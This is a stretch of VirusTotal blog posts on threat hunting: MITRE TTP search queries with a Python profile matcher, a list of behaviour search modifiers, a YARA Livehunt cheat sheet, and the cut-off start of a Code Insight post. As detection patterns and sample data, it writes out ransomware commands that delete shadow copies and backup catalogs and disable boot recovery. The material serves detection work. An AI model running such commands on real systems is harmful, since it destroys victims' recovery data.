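<div class="interval_12">The ransomware and keylogger queries above are, in effect, two hunting profiles. The same logic can be run locally over behaviour reports you have already retrieved, for instance to re-check a batch of samples when a profile changes. The following Python code is an added example, not part of this post or of VirusTotal's code: it encodes the ransomware profile (T1490, T1083 and T1135 plus the CryptEncrypt call, with vssadmin/bcdedit command lines kept as supporting evidence, as seen in the BlackHunt report) and the keylogger profile (T1056.001 plus either the Command and Control or the Exfiltration tactic), and matches constructed reports against them. The report keys and the technique-to-tactic map are assumptions made for the demo; a real deployment would take the reports from the VirusTotal API and the mapping from the ATT&CK STIX data.</div>

```python
"""Match sandbox behaviour reports against TTP hunting profiles.

Added example, not VirusTotal's own code: it applies locally the logic of
the two Intelligence queries in this post (ransomware = T1490 AND T1083 AND
T1135 AND behavior:CryptEncrypt; keylogger = T1056.001 AND (TA0011 OR TA0010)).
Report keys (mitre_attack_techniques, calls_highlighted, processes_created)
follow the shape of a VT file behaviour object but are an assumption here;
the reports at the bottom are constructed, not real sandbox output.
"""
import re
from dataclasses import dataclass

TACTIC_RE = re.compile(r"^TA\d{4}$")
TECHNIQUE_RE = re.compile(r"^T\d{4}(\.\d{3})?$")

# Partial technique -> tactic map: the ids used in this post plus T1071
# (Application Layer Protocol, Command and Control). Production code would
# load the full mapping from the ATT&CK STIX bundle.
TECHNIQUE_TACTICS = {"T1490": {"TA0040"}, "T1486": {"TA0040"},
                     "T1083": {"TA0007"}, "T1135": {"TA0007"},
                     "T1056.001": {"TA0009"}, "T1071": {"TA0011"}}


@dataclass(frozen=True)
class Profile:
    """all_techniques and highlighted_calls must all be present; one of any_tactics
    must be present when that set is non-empty; process_patterns only gather evidence."""
    name: str
    all_techniques: frozenset = frozenset()
    any_tactics: frozenset = frozenset()
    highlighted_calls: frozenset = frozenset()
    process_patterns: tuple = ()

    def __post_init__(self):
        bad = [t for t in self.all_techniques if not TECHNIQUE_RE.match(t)]
        bad += [t for t in self.any_tactics if not TACTIC_RE.match(t)]
        if bad:
            raise ValueError(f"malformed ATT&CK ids in {self.name}: {bad}")


RANSOMWARE = Profile("ransomware", all_techniques=frozenset({"T1490", "T1083", "T1135"}),
                     highlighted_calls=frozenset({"CryptEncrypt"}),
                     process_patterns=(r"vssadmin(\.exe)?\s+delete\s+shadows",
                                       r"\bbcdedit(\.exe)?\b"))
KEYLOGGER = Profile("keylogger", all_techniques=frozenset({"T1056.001"}),
                    any_tactics=frozenset({"TA0011", "TA0010"}))


def techniques_in(report):
    """Observed technique ids plus the parent of each sub-technique, so a
    profile asking for T1056 also matches a report that shows T1056.001."""
    ids = set()
    for entry in report.get("mitre_attack_techniques", []):
        ids.update({entry["id"], entry["id"].split(".")[0]})
    return ids


def tactics_in(report):
    """Tactics implied by the observed techniques via TECHNIQUE_TACTICS."""
    return set().union(*(TECHNIQUE_TACTICS.get(t, set()) for t in techniques_in(report)))


def match_profile(report, profile):
    """Return (matched, evidence); evidence names what is missing so that a
    near-miss can be triaged instead of silently dropped."""
    calls = {c.lower() for c in report.get("calls_highlighted", [])}
    missing_techniques = sorted(profile.all_techniques - techniques_in(report))
    missing_calls = sorted(c for c in profile.highlighted_calls if c.lower() not in calls)
    tactic_ok = not profile.any_tactics or bool(profile.any_tactics & tactics_in(report))
    process_hits = [c for c in report.get("processes_created", [])
                    if any(re.search(p, c, re.I) for p in profile.process_patterns)]
    matched = not missing_techniques and not missing_calls and tactic_ok
    return matched, {"missing_techniques": missing_techniques, "missing_calls": missing_calls,
                     "tactic_ok": tactic_ok, "process_hits": process_hits}


def hunt(reports, profile):
    """Hashes of every report matching the profile, like a query result list."""
    return [r["sha256"] for r in reports if match_profile(r, profile)[0]]


# Constructed reports with placeholder hashes, not real sandbox output.
RANSOMWARE_REPORT = {
    "sha256": "<constructed-ransomware-sample>",
    "mitre_attack_techniques": [{"id": t} for t in ("T1490", "T1083", "T1135", "T1486")],
    "calls_highlighted": ["CryptEncrypt", "IsDebuggerPresent"],
    "processes_created": ["vssadmin.exe delete shadows /all /quiet",
                          "bcdedit.exe /set {default} recoveryenabled no"]}
KEYLOGGER_REPORT = {"sha256": "<constructed-keylogger-sample>",
                    "mitre_attack_techniques": [{"id": "T1056.001"}, {"id": "T1071"}],
                    "calls_highlighted": ["GetAsyncKeyState"], "processes_created": []}
DISCOVERY_ONLY_REPORT = {"sha256": "<constructed-discovery-only-sample>",  # matches neither
                         "mitre_attack_techniques": [{"id": "T1083"}],
                         "calls_highlighted": [], "processes_created": []}
SAMPLE_REPORTS = [RANSOMWARE_REPORT, KEYLOGGER_REPORT, DISCOVERY_ONLY_REPORT]

if __name__ == "__main__":
    for profile in (RANSOMWARE, KEYLOGGER):
        print(profile.name, "->", hunt(SAMPLE_REPORTS, profile))
```

<div class="interval_12">Returning the evidence alongside the verdict lets an analyst see why a sample fell short of a profile (discovery techniques without T1490 or without the CryptEncrypt call, for instance), which is exactly the kind of near-miss worth a second look; the process hits mirror the <b>behavior_processes</b> examples of Appendix I and can be promoted to hard requirements once the profile has been tuned.</div>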
<br/>
<h2 style="text-align: left;">Conclusions</h2>
<div class="interval_12">
In this post we have seen, using a couple of examples, how present the <b>MITRE</b> framework is on VirusTotal and how it can be used to search for files with a particular TTP-based behavior using <b>VirusTotal Intelligence</b> searches. MITRE-related data is based on behavior detected during samples' sandbox detonation.
</div>
<div class="interval_12">
We have additionally created <a href="#apendix">Appendix I</a> (below) detailing some of the most interesting behavior search modifiers you can use in your queries. These fit particularly well with the TTP-based modifiers, allowing you to refine results by adding technical characteristics specific to the malware under analysis.
</div>
<div class="interval_12">
We hope you found this post interesting and useful. For suggestions or feedback please feel free to reach out <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">here</a>; we will be happy to hear from you.
</div>
<div class="interval_12">
Happy hunting!
</div>
<br/>
<h2 style="text-align: left;"> <a name="apendix">Appendix I - Behavior search modifiers </a></h2>
<div class="interval_12">
The following search modifiers provide a more granular way of searching files based on their behavior, allowing more restrictive queries when combined with the <b>Tactics/Techniques</b> (<b>"attack_tactic"</b>, <b>"attack_technique"</b>) search modifiers.
</div>
<div class="interval_12">
<ul>
<li><b>"behavior_processes"</b>: followed by the executable and parameters of a process run during the sample's dynamic analysis:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_processes%253A%2522%255C%255Cvssadmin.exe%2520delete%2520shadows%2520%252Fall%2520%252Fquiet%2522/files" target="_blank">behavior_processes:"\\vssadmin.exe delete shadows /all /quiet"</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior_processes%253A%2522wbadmin.exe%2520delete%2520catalog%2520-quiet%2522/files" target="_blank">behavior_processes:"wbadmin.exe delete catalog -quiet"</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior_processes%253A%2522%2520tree%2520c%253A%255C%255C%2522/files" target="_blank">behavior_processes:" tree c:\\"</a></li>
</ul>
<li><b>"behavior_injected_processes"</b>: followed by the name, with or without extension, of a process the sample injected into:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_injected_processes%253Alsass.exe/files" target="_blank">behavior_injected_processes:lsass.exe</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior_injected_processes%253AWininit.exe/files" target="_blank">behavior_injected_processes:Wininit.exe</a></li>
</ul>
<li><b>"behavior_created_processes"</b>: followed by the name, with or without extension, of a process the sample created:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_created_processes%253A%2520Wininit.exe%2520%2520NOT%2520name%253AWininit.exe/files" target="_blank">behavior_created_processes: Wininit.exe NOT name:Wininit.exe </a></li>
</ul>
<li><b>"behavior_services"</b>: followed by the service name to get files opening or deleting internal services:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_services%253A%2520sysmon/files" target="_blank">behavior_services: sysmon</a></li>
</ul>
<li><b>"behavior_registry"</b>: followed by a system registry key, to check for new, deleted or modified registry keys:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_registry%253A%2522%255CSoftware%255CMicrosoft%255CWindows%255CCurrentVersion%255CRun%2522/files" target="_blank">behavior_registry:"\Software\Microsoft\Windows\CurrentVersion\Run"</a></li>
</ul>
<li><b>"behavior_network"</b>: followed by a URL, domain or IP address, to identify files communicating with those network elements:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_network%253Aip-api.com/files" target="_blank">behavior_network:ip-api.com</a></li>
</ul>
<li><b>"behavior_files"</b>: followed by the file name (with or without extension) and/or path, to identify files that were opened, written, deleted or dropped:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_files%253A%2520%2522C%253A%255CProgramData%255CVaccine.txt%2522/files" target="_blank">behavior_files: "C:\ProgramData\Vaccine.txt"</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior_files%253A%2520%2522%255CMicrosoft%255CWindows%255CStart%2520Menu%255CPrograms%255CStartup%255C*%2522/files" target="_blank">behavior_files: "\Microsoft\Windows\Start Menu\Programs\Startup\*"</a></li>
</ul>
<li><b>"behavior"</b>: all the previous search modifiers in this appendix can be replaced by this one. It matches against the whole file behavior report and provides a way to check for other data that doesn't have a specific search modifier assigned:</li>
<ul>
<li><b>API calls</b>: <b>Calls Highlighted</b> subsection under <b>Highlighted actions</b> section of a file behavior report:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior%253A%2520CryptEncrypt/files" target="_blank">behavior: CryptEncrypt</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior%253A%2520IsDebuggerPresent/files" target="_blank">behavior: IsDebuggerPresent</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior%253A%2520IsWow64Process/files" target="_blank">behavior: IsWow64Process</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior%253A%2520GetSystemMetrics/files" target="_blank">behavior: GetSystemMetrics</a></li>
<li><a href="https://www.virustotal.com/gui/search/behavior%253A%2520GetAsyncKeyState/files" target="_blank">behavior: GetAsyncKeyState</a></li>
</ul>
<li><b>Mutexes</b> created or opened, under the <b>Synchronization mechanisms & Signals</b> section of a file behavior report:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior%253ABLACK_HUNT_MUTEX/files" target="_blank">behavior:BLACK_HUNT_MUTEX</a></li>
</ul>
<li><b>Modules loaded</b> section of a file behavior report:</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior%253ACRYPTSP.DLL/files" target="_blank">behavior:CRYPTSP.DLL</a></li>
</ul>
</ul>
<li><b>"behavior_tags"</b>: followed by the tag of interest, to get files assigned that tag; the list of available tags can be checked <a href="https://docs.virustotal.com/docs/list-behaviour-tag-modifiers" target="_blank">here</a>.</li>
<ul>
<li><a href="https://www.virustotal.com/gui/search/behavior_tags%253Adetect_debug_environment/files" target="_blank">behavior_tags:detect_debug_environment</a></li>
</ul>
</ul>
</div>
<a href="" target="_blank">
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
<!--
.central_img img {
border: 1px solid #000000;
}
-->
.central_img p {
text-align: center;
font-style: italic;
}
.central_img_set{
text-align: center;
font-style: italic;
margin: auto;
width: auto;
padding: auto;
display: block;
}
.img_container{
float:central;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
<div class="interval_12">Author: <a href="http://www.blogger.com/profile/08447900589635774086" target="_blank">Alexandra Martin</a></div>
<h2 style="text-align: left;">VT Livehunt Cheat Sheet</h2>
<div class="interval_12">Published 2024-02-06.</div>
<div class="interval_12"> Today we are happy to announce the release of our “<b>Livehunt Cheat Sheet</b>”, a guide to help you quickly implement monitoring rules in Livehunt. You can find the <b>PDF</b> <b>version</b> <a href="http://virustotal.com/go/livehunt-cheatsheet" target="_blank">here</a>.
</div>
<div class="interval_12"> VirusTotal Livehunt is a service that continuously scans all incoming indicators and notifies you when any of them matches your rules. Livehunt not only monitors files, but also <a href="https://docs.virustotal.com/docs/nethunt" target="_blank">domains, URLs, and IP addresses</a>. In this post we detail a few practical examples along with useful tips.
</div>
<br />
<h2 style="text-align: left;">VT Module</h2>
<div class="interval_12"> This YARA module was created for VT Hunting services to expose all the context data VirusTotal holds about a file, structured in two main sections: metadata and behaviour (sandbox execution). You can find more information about the VT module <a href="https://docs.virustotal.com/docs/writing-yara-rules-for-livehunt#the-vt-module" target="_blank">here</a>.
</div>
<br />
<h2 style="text-align: left;">Using metadata information in Livehunt rules</h2>
<div class="interval_12"> Analysts can create rules that hunt on the metadata VirusTotal gathers and processes: file characteristics (type, size, signatures), reputation (antivirus detections, submission patterns) and contextual details (file names, tags, etc.).
</div>
<div class="interval_12"> For example, this allows analysts to detect files of a certain type that were submitted several times from a given country and that more than 5 antivirus engines have flagged as malicious. Here are some detailed examples:
</div>
<br />
<div class="interval_12"><u><b> Example 1: Malicious DOCX files that use macros:
</b></u></div>
<div class="interval_12"> This example defines a rule focused on detecting potentially malicious DOCX files with macros.
</div>
<div class="interval_12"> First we check the file type with <b>vt.metadata.file_type == vt.FileType.DOCX</b>.
</div>
<div class="interval_12"> The next condition (<b>vt.metadata.analysis_stats.malicious > 5</b>) matches files flagged as malicious by more than 5 antivirus engines in VirusTotal. This filters out most of the benign files, and can be adjusted according to the investigation.
</div>
<div class="interval_12"> Finally, it iterates over all the tags assigned by the security tools in the analysis pipeline and looks for the tag "macros" (note the straight double quotes, which YARA requires): <b>for any tag in vt.metadata.tags: (tag == "macros")</b>
</div>
<br />
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br /><br />
<mark class="blue">rule</mark> malicious_docx_macros <mark class="dark-blue">{</mark><br />
<mark class="blue">meta</mark>:<br />
description = <mark class="red">"Detect malicious documents using macros."</mark><br />
<mark class="blue">condition</mark>:<br />
vt.metadata.file_type == vt.FileType.DOCX <mark class="blue">and</mark><br />
vt.metadata.analysis_stats.malicious > <mark class="green">5 </mark><mark class="blue">and</mark><br />
<mark class="blue">for any</mark> tag <mark class="blue">in</mark> vt.metadata.tags: (tag == <mark class="red">"macros"</mark>)<br />
<mark class="dark-blue">}</mark>
</div>
<br />
<div class="interval_12"><u><b> Example 2: Possible LNK execution through CommandLineArguments Exif metadata field:
</b></u></div>
<div class="interval_12"> The following rule is designed to identify <b>.lnk files</b> whose metadata fields have been manipulated to launch <b>PowerShell</b>. This <a href="https://www.docguard.io/lnk-file-based-attacks-are-on-the-rise/" target="_blank">technique</a> is frequently used by malware to avoid detection and initiate attacks. For example, the report of <a href="https://www.virustotal.com/gui/file/dc9e5e353cdd094f2446e4aa4ad0106494719866f26d486e9d69765383296198/details" target="_blank">this malicious .lnk file</a> shows the target command line, which executes PowerShell code to download the “powercat.ps1” script.
</div>
<br />
<div class="central_img width_80 interval_12"><img height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHeEqT_A4aaf3iGQ0cu2hyphenhyphenNXuLcBPtXDaz9zP8hjUFCJtTkTUdEF7kGwTMbpo1T0eFv6H0XflDHV6aSykUwm4n-DXOt3QwgPhYdQn1lndB413X6sETWtaZRBFSTVTpVm3nlB-2VoDA_MjLTMw5DwFWtSpmDorVBhgMzgoPvIFL_wsjU5qPcwSMK7wutg/w640-h240/lnk_metadata.png" width="640" /></div>
<br />
<div class="interval_12">In this case, the condition checks for the string “powershell” in the two <b>EXIF metadata</b> fields that usually hold the command line of a shortcut, “CommandLineArguments” and “RelativePath”: </div>
<div class="interval_12"><b>vt.metadata.exiftool["CommandLineArguments"] icontains "powershell"<br />
vt.metadata.exiftool["RelativePath"] icontains "powershell"
</b></div>
<br />
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br /><br />
<mark class="blue">rule</mark> LNK_metadata_execution_powershell <mark class="dark-blue">{</mark><br />
<mark class="blue">meta</mark>:<br />
description = <mark class="red">"Detect possible LNK execution through CommandLineArguments Exif metadata field"</mark><br />
<mark class="blue">condition</mark>:<br />
vt.metadata.exiftool["CommandLineArguments"] <mark class="blue">icontains </mark><mark class="red">"powershell" </mark><mark class="blue">or</mark><br />
vt.metadata.exiftool["RelativePath"] <mark class="blue">icontains </mark><mark class="red">"powershell"</mark><br />
<mark class="dark-blue">}</mark>
<br />
</div>
<br />
<h2 style="text-align: left;">Using behaviour information in Livehunt rules</h2>
<div class="interval_12"> Dynamic analysis can bring great value on top of static analysis. In VirusTotal, we run executable files through multiple sandboxes and normalize their output into a common format, which can be leveraged through the “vt” module.
</div>
<br />
<div class="interval_12"><u><b> Example 3: Malicious files that use persistence using VBScript:
</b></u></div>
<div class="interval_12"> The following rule identifies persistence under the <b>"RunOnce"</b> registry key using <b>VBS files</b>. Programs registered under this key execute automatically, once, the next time a user logs in, which malware often abuses to maintain its presence on a system.
</div>
<div class="interval_12"> For this rule, we iterate over <b>vt.behaviour.registry_keys_set</b> looking for <b>"\\CurrentVersion\\RunOnce\\"</b> with a value that ends with <b>".vbs"</b>.
</div>
<br />
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br /><br />
<mark class="blue">rule</mark> persistence_runonce_vbs <mark class="dark-blue">{</mark><br />
<mark class="blue">meta</mark>:<br />
description = <mark class="red">"Detect persistence by establishing a VBS file in the runonce key"</mark><br />
<mark class="blue">condition</mark>:<br />
<mark class="blue">for any</mark> registry_key <mark class="blue">in </mark>vt.behaviour.registry_keys_set: (<br />
registry_key.key <mark class="blue">icontains</mark> <mark class="red">"\\CurrentVersion\\RunOnce\\"</mark> <mark class="blue">and</mark><br />
registry_key.value <mark class="blue">endswith </mark><mark class="red">".vbs"</mark><br />
)
<br />
<mark class="dark-blue">}</mark>
<br />
</div>
<br />
<div class="interval_12"><u><b> Example 4: Suspicious shell scripts in "profile.d" folder:
</b></u></div>
<div class="interval_12"> This rule detects activity involving the creation or modification of <b>shell scripts</b> (.sh files) within the <b>"/etc/profile.d/"</b> directory on Linux systems. This directory is often used to host scripts that automatically execute during user login, making it a common target for malware seeking persistence or automatic execution.
</div>
<div class="interval_12"> The first condition iterates over the files dropped during execution (<b>vt.behaviour.files_dropped</b>), as observed in VirusTotal's behavioural analysis, and checks whether the dropped file's path contains "/etc/profile.d/" and ends with ".sh", so that only shell scripts match.
</div>
<div class="interval_12"> The second condition is very similar but checks the file path for files written (<b>vt.behaviour.files_written</b>) during detonation.
</div>
<br />
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br /><br />
<mark class="blue">rule</mark> profile_folder_shell_script <mark class="dark-blue">{</mark><br />
<mark class="blue">meta</mark>:<br />
description = <mark class="red">"Detects shell script creation in the \"profile.d\" path."</mark><br />
<mark class="blue">condition</mark>:<br />
<mark class="blue">for any</mark> dropped <mark class="blue">in </mark>vt.behaviour.files_dropped: (<br />
dropped.path <mark class="blue">contains</mark> <mark class="red">"/etc/profile.d/"</mark><br />
<mark class="blue">and</mark> dropped.path <mark class="blue">endswith</mark> <mark class="red">".sh"</mark><br />
)<br />
<mark class="blue">or</mark><br />
<mark class="blue">for any</mark> file_path <mark class="blue">in </mark>vt.behaviour.files_written: (<br />
file_path <mark class="blue">contains</mark> <mark class="red">"/etc/profile.d/"</mark><br />
<mark class="blue">and</mark> file_path <mark class="blue">endswith</mark> <mark class="red">".sh"</mark><br />
)
<br />
<mark class="dark-blue">}</mark>
<br />
</div>
<br />
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12"> The VirusTotal (vt) YARA module brings you unprecedented flexibility in crafting Livehunt rules, combining traditional file content analysis with rich metadata and behavioural patterns from dynamic analysis.
</div>
<div class="interval_12"> Our <a href="https://www.virustotal.com/go/vti-cheatsheet" target="_blank">“VT Intelligence Cheat Sheet”</a> provides a quick guide to implement some of the most used techniques. If you have any suggestions or want to share feedback please feel free to reach out <a href="http://virustotal.com/contact" target="_blank">here</a>.
</div>
<br />
<div class="interval_12"> Happy Hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
</style>
<div class="interval_12">Author: <a href="http://www.blogger.com/profile/13300156415377228655" target="_blank">Raimundo Alcázar</a></div>
<h2 style="text-align: left;">Uncovering Hidden Threats with VirusTotal Code Insight</h2>
<p>Published 2024-01-22.</p>
<p>In the constantly changing world of cybersecurity, generative AI is becoming an increasingly valuable tool. This blog post shows various examples that elude traditional detection engines yet are adeptly unveiled by Code Insight. We explore diverse scenarios, ranging from firmware patches in DJI drones that disable red flight lights, to the covert theft of WhatsApp session cookies, phishing targeting Tesla customers, automated login attempts on the Medtronic CareLink Network, Bitcoin wallet attacks, Tik-Tok viewbots, unauthorized Netflix account access, cheaters for Roblox, and automation of Tinder’s match-making, along with a range of other scenarios.</p>
<p>Code Insight, based on <a href="https://cloud.google.com/blog/products/ai-machine-learning/duet-ai-for-developers-and-in-security-operations-now-ga" style="color: #1155cc; text-decoration: none;">Google Cloud Duet AI</a>, was unveiled at RSA Conference 2023 as a novel feature of VirusTotal. It's specialized in analyzing code snippets and generating reports in natural language from a cybersecurity and malware expert's perspective. Since its introduction, millions of files have been analyzed by Code Insight. The reports generated are readily accessible for consultation and can be leveraged through the VirusTotal Enterprise service for large-scale result aggregation and exploitation. This functionality allows security teams to quickly and efficiently examine vast amounts of code, pinpoint potential threats, and enhance their overall security posture.</p>
<p>Let's delve into some intriguing anecdotal examples that demonstrate how we can uncover threats by utilizing the reports generated by Code Insight. These instances not only showcase the tool's analytical strength but also illustrate the practical applications of its findings in real-world cybersecurity scenarios.</p>
<p>Imagine working on the cybersecurity team at Roblox and wanting to explore what Code Insight has discovered. A simple query in VT Enterprise, such as <b>codeinsight:Roblox</b>, would yield more than 2,000 related files.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLYx3bUmpxVcKR8ldbgac1PYgQVX6ZiJo-zmug82YZ0vpq9F-T1AntECCWYGRInLS-pN6nXqPayIq1AdPeLe-jpOyEenrYOge7DmUxcB_cPUD9nBiADP06XywBjgXqvHKQrJ-uWH0Ya4ZkXx3_Xizm_fY1AnPYMpzJdVfErbVbY2jxCSsaMRbTF3izB4/s1600/codeinsightRoblox.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="862" data-original-width="1918" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLYx3bUmpxVcKR8ldbgac1PYgQVX6ZiJo-zmug82YZ0vpq9F-T1AntECCWYGRInLS-pN6nXqPayIq1AdPeLe-jpOyEenrYOge7DmUxcB_cPUD9nBiADP06XywBjgXqvHKQrJ-uWH0Ya4ZkXx3_Xizm_fY1AnPYMpzJdVfErbVbY2jxCSsaMRbTF3izB4/s1600/codeinsightRoblox.png"/></a></div>
</center>
<br>
<p>Continuing from the previous exploration with Code Insight, let's focus even more closely. Say you're an Anti-Cheat Software Engineer at Roblox interested in the "Murder Mystery 2" game. By refining your search in VT Enterprise to <b>codeinsight:Roblox AND codeinsight:"Murder Mystery 2" AND codeinsight:cheat</b>, the results are much more specific. This refined query leads to a fascinating find - a single file.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJOl4JnZWzL9Nq8rMxmZyVWkMX24Nw4qD-CS_Mex1wUCsvMIlH87C6rD7Nww7Z-M533CuEFAwud2OOcdanaK76qxtNw-jG2OCIOgs2aPPHOF924edkoS3qQOk3xYlS0MGEYlDb12CDI0QbAYY682tyu6v9HD3sb2bgH27ZD6rekaZPDISbYql4Gs0jXUc/s1600/cheatmisteryRoblox.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="441" data-original-width="1911" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJOl4JnZWzL9Nq8rMxmZyVWkMX24Nw4qD-CS_Mex1wUCsvMIlH87C6rD7Nww7Z-M533CuEFAwud2OOcdanaK76qxtNw-jG2OCIOgs2aPPHOF924edkoS3qQOk3xYlS0MGEYlDb12CDI0QbAYY682tyu6v9HD3sb2bgH27ZD6rekaZPDISbYql4Gs0jXUc/s1600/cheatmisteryRoblox.png"/></a></div>
</center>
<br>
<p>The file was initially received by VirusTotal as a plain text file, but Code Insight correctly classifies it as a Lua script and provides a detailed report on its functionality. This example demonstrates Code Insight's precision in identifying and analyzing content within a specific context, which proves invaluable for targeted cybersecurity investigations.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik0wnpw7EF_DEUPu7W_jLX6uvgg0S4UDhUloD6WZVOkgg81wpHQZyhlsTMHwFZ-Zk5z_E-bIYky_GVM4D8RH1ySYuzp0z0V64DEosXkP4WA0p9dKz95vnTahQbyDbyoFmAu2yAV44YYDfqZO8Gy3YMRFNHNBBV7qUY_qeMR-9RuMPx4D2c7ssTgUO4gkE/s1600/luacheaterRoblox.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1382" data-original-width="1424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik0wnpw7EF_DEUPu7W_jLX6uvgg0S4UDhUloD6WZVOkgg81wpHQZyhlsTMHwFZ-Zk5z_E-bIYky_GVM4D8RH1ySYuzp0z0V64DEosXkP4WA0p9dKz95vnTahQbyDbyoFmAu2yAV44YYDfqZO8Gy3YMRFNHNBBV7qUY_qeMR-9RuMPx4D2c7ssTgUO4gkE/s1600/luacheaterRoblox.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<a href="https://www.virustotal.com/gui/file/6cc2daf625f329f10c0771eea5924d868edf5445de6565acdd2e02d9c89f70b6/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">6cc2daf625f329f10c0771eea5924d868edf5445de6565acdd2e02d9c89f70b6</span></span></a></p>
</center>
<p>Shifting our focus, let's say we are now investigating a technique used to modify the firmware of DJI drones that turns off LED lights during flight. To discover if Code Insight has identified such modifications, we could use a targeted VT Enterprise search: <b>codeinsight:DJI AND codeinsight:firmware AND codeinsight:lights</b>. Voilà, the search results reveal this:</p>
<center>
